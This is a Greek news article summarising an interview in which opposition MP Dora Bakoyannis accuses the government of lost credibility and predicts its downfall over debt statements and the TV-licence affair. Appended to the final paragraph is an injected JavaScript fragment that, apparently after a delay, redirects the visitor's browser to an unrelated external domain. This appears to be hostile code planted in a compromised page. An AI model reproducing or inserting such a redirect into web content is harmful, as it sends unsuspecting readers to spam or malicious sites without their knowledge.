Ντ. Μπακογιάννη: H αντίστροφη μέτρηση ξεκίνησε για την κυβέρνηση

0
2

 

«Η «συμφωνία αλήθειας» που προτείνουμε στον ελληνικό λαό δεν είναι ένα σύνθημα κενό περιεχομένου. Θα σηματοδοτήσει το τέλος του λαϊκισμού και θα ενώσει τους Έλληνες ανεξάρτητα με το τι ψήφιζαν ως χθες, σε ένα και μοναδικό στόχο, τη δημιουργία της νέας Ελλάδας, μιας σύγχρονης ευρωπαϊκής χώρας», δηλώνει η βουλευτής της ΝΔ Ντόρα Μπακογιάννη σε συνέντευξή της στην εφημερίδα «Αγορά».

Υποστηρίζει ότι η κυβέρνηση δεν έχει πλέον αξιοπιστία και φέρνει ως παράδειγμα τις δηλώσεις του αντιπροέδρου της κυβέρνησης Γιάννη Δραγασάκη για το χρέος, λέγοντας ότι «είναι εντελώς αντίθετες από τις εξαγγελίες του πρωθυπουργού στη ΔΕΘ».

Η κ. Μπακογιάννη δηλώνει ότι «από την παρουσία του πρωθυπουργού στη ΔΕΘ το μόνο που έμεινε στην κοινή γνώμη είναι ο κυνισμός της εξουσίας που επέδειξε» και σημειώνει ότι «αυτό σημαίνει ότι η αντίστροφη μέτρηση ξεκίνησε».

Για το θέμα των τηλεοπτικών αδειών η πρώην υπουργός εκτιμά ότι «θα καταλήξει μπούμερανγκ για την κυβέρνηση» υπογραμμίζοντας ότι «η κυβέρνηση σήμερα βρίσκεται μπροστά στο αδιέξοδο του κλεισίματος επιχειρήσεων και των απολύσεων χιλιάδων εργαζομένων». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here